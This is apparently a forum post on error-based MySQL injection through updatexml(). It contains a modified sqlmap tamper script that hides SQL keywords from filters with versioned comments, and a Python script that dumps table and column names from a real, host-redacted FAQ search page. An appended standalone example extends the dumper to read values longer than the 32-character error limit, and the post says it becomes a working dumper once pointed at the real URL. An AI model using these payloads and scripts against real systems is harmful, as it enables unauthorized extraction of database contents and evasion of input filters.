I used sqlmap to run an updatexml (error-based) injection and found that the target blocked certain SQL keywords. Wrapping the keywords in MySQL inline comments (/*!...*/) got around the filter, so I modified the halfversionedmorekeywords.py tamper script to do that, but sqlmap still could not dump the results. >_<
The halfversionedmorekeywords.py tamper script was modified as follows (the stock script prefixes each keyword with an unclosed /*!0; the edit wraps each keyword in a closed /*!12345...*/ versioned comment instead):
#!/usr/bin/env python

import os
import re

from lib.core.common import singleTimeWarnMessage
from lib.core.data import kb
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY
from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS

__priority__ = PRIORITY.HIGHER


def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))


def tamper(payload, **kwargs):
    # Wrap every keyword sqlmap knows about in a closed versioned comment,
    # e.g. AND -> /*!12345AND*/. MySQL executes the comment body on any
    # server version above 1.23.45, while a keyword filter no longer sees
    # the bare word. (The stock script emits an unclosed /*!0AND instead.)
    def process(match):
        word = match.group('word')

        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
            return match.group().replace(word, "/*!12345%s*/" % word)
        else:
            return match.group()

    retVal = payload

    if payload:
        retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)
        # Left over from the stock script; it never matches once the /*!12345 form is used.
        retVal = retVal.replace(" /*!0", "/*!0")

    return retVal
So I wrote my own script instead; with the code below the table names and column names were dumped successfully.
# coding=utf-8
import re
import binascii
import warnings

import requests

warnings.filterwarnings("ignore")

# Vulnerable search page (host redacted on the original page). The injection point is
# the searchkey parameter; every keyword is wrapped in /*!...*/ to get past the filter.
BASE = ("https://xxx:6002/customer/faq.php?code=faq&category=&"
        "searchopt=content&searchkey=1")
TAIL = "&x=4&y=23"

# updatexml() rejects the string as XPath and echoes it back:
#   XPATH syntax error: '~value~'
# Caveat: MySQL prints at most 32 characters of that string, so a value longer than
# about 30 characters loses its closing ~ and this pattern will not match it.
LEAK = re.compile(r"'~(.*)~'")

# The line-comment terminator is written "-- -" here (dash, dash, space, dash);
# the original page shows it as "---", which MySQL does not treat as a comment.

table_name_list = []

# Traverse table names. "limit k,1" is zero-based, so start at 0
# (the original loop started at 1 and skipped the first row).
for k in range(0, 112):
    url = (BASE + "'/*!and*//*!updatexml*/"
           "(1,concat(0x7e,(select/*!table_name*//*!from*/information_schema.tables limit "
           + str(k) + ",1),0x7e),3)-- -" + TAIL)
    req = requests.get(url)
    a = LEAK.findall(req.text)
    if a:
        table_name_list.append(a[0])

print(table_name_list)

for i in table_name_list:
    print("the table name is:", i)  # output table name
    # Compare against the hex form so no quote characters appear in the payload.
    hex_name = binascii.b2a_hex(i.encode()).decode()

    # Count the columns of this table. The inner concat adds a second pair of ~,
    # so the leaked text looks like '~~5~~' and the captured group is '~5~'.
    url = (BASE + "'/*!and*//*!updatexml*/(1,concat(0x7e,"
           "(/*!select*//*!distinct*/concat(0x7e,/*!count(column_name)*/,0x7e)/*!from*//*!information_schema.columns*/"
           "where/*!table_name=0x" + hex_name + "*/),0x7e),3)-- -" + TAIL)
    req = requests.get(url)
    b = LEAK.findall(req.text)
    if not b:
        continue
    m = int(b[0].strip("~"))
    print("the number of rows is:", m)  # number of columns

    # Traverse column names ("limit n,1" is zero-based as well).
    for n in range(0, m):
        url = (BASE + "'/*!and*//*!updatexml*/(1,concat(0x7e,"
               "(/*!select*//*!distinct*/concat(0x7e,/*!column_name*/,0x7e)/*!from*//*!information_schema.columns*/"
               "where/*!table_name=0x" + hex_name + "*/limit " + str(n) + ",1),0x7e),3)-- -" + TAIL)
        req = requests.get(url)
        c = LEAK.findall(req.text)
        if c:
            print("fields:", c[0].strip("~"))
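As an added example (not code from the original post), the standalone Python below combines the two ideas above, the keyword wrapping of the edited tamper script and the updatexml error channel of the dump script, and handles one caveat the page's '~(.*)~' pattern does not: MySQL prints at most 32 characters of the offending XPath, so a value longer than about 30 characters loses its closing ~ and is silently missed. The example instead reads each value in 31-character slices with mid() until a short slice arrives. The blocked keyword list, the fake_server stand-in and its canned rows are constructed for this example; against a real target, send would be a requests.get wrapper around the page's URL.

```python
import re

# Constructed for this example: keywords the target's filter is assumed to block.
BLOCKED_KEYWORDS = {"AND", "OR", "SELECT", "FROM", "WHERE", "UNION", "UPDATEXML", "LIMIT"}

# MySQL shows at most 32 characters of the bad XPath; one of them is our '~' marker.
XPATH_ERROR_LIMIT = 32
CHUNK = XPATH_ERROR_LIMIT - 1

XPATH_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def wrap_keywords(sql, version="12345"):
    """Wrap each blocked keyword in a closed versioned comment, AND -> /*!12345AND*/.
    Same idea as the edited tamper script, but with no sqlmap dependencies.
    The lookarounds leave hex literals such as 0x7e and names like col1 untouched."""
    def repl(match):
        word = match.group(0)
        if word.upper() in BLOCKED_KEYWORDS:
            return "/*!%s%s*/" % (version, word)
        return word
    return re.sub(r"(?<!\w)[A-Za-z_]+(?!\w)", repl, sql)


def updatexml_payload(expr, pos, length=CHUNK):
    """Error-based probe: leaks characters pos..pos+length-1 of expr's result by
    handing them to updatexml() as an invalid XPath (the ~ marks where data starts)."""
    return " and updatexml(1,concat(0x7e,mid((%s),%d,%d)),3)-- -" % (expr, pos, length)


def extract(expr, send, max_chunks=64):
    """Read the whole value of expr through the truncated error channel.
    send(payload) returns the response body; in the page's script that is requests.get."""
    value = ""
    for i in range(max_chunks):
        body = send(wrap_keywords(updatexml_payload(expr, 1 + i * CHUNK)))
        match = XPATH_RE.search(body)
        if match is None:
            break  # nothing leaked: expr returned NULL or the request was filtered
        chunk = match.group(1)
        value += chunk
        if len(chunk) < CHUNK:
            break  # a short (or empty) slice means the end of the value
    return value


# --- Offline stand-in for the vulnerable page (constructed data, not the real target) ---
FAKE_ROWS = {
    "select table_name from information_schema.tables limit 0,1":
        "customer_faq_entries_with_a_deliberately_long_name",  # 50 chars: needs two probes
    "select count(column_name) from information_schema.columns where table_name=0x666171":
        "5",
}
MID_RE = re.compile(r"mid\(\((.*?)\),(\d+),(\d+)\)")


def fake_server(payload):
    """Behaves like a MySQL-backed page: executes the text inside /*!12345...*/ comments,
    evaluates mid() over a canned value and truncates the XPath error to 32 characters."""
    executed = re.sub(r"/\*!\d{5}([^*]*)\*/", r"\1", payload)
    match = MID_RE.search(executed)
    if match is None:
        return "<html><body>no results</body></html>"
    expr, pos, length = match.group(1), int(match.group(2)), int(match.group(3))
    row = FAKE_ROWS.get(expr)
    if row is None:
        return "<html><body>no results</body></html>"  # NULL input: updatexml raises no error
    xpath = ("~" + row[pos - 1:pos - 1 + length])[:XPATH_ERROR_LIMIT]
    return "<html><body>XPATH syntax error: '%s'</body></html>" % xpath


if __name__ == "__main__":
    name = extract("select table_name from information_schema.tables limit 0,1", fake_server)
    print("table name (%d chars): %s" % (len(name), name))
```

The first probe for the long table name comes back as '~customer_faq_entries_with_a_del' with no closing ~, which is exactly the response the page's regex would drop; the second probe (pos 32) returns the remaining 19 characters and, being shorter than 31, ends the loop. Swapping fake_server for a function that GETs the real URL with the payload appended to searchkey turns this into a working dumper.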
Found a hole. Bye.
Updatexml injection Python script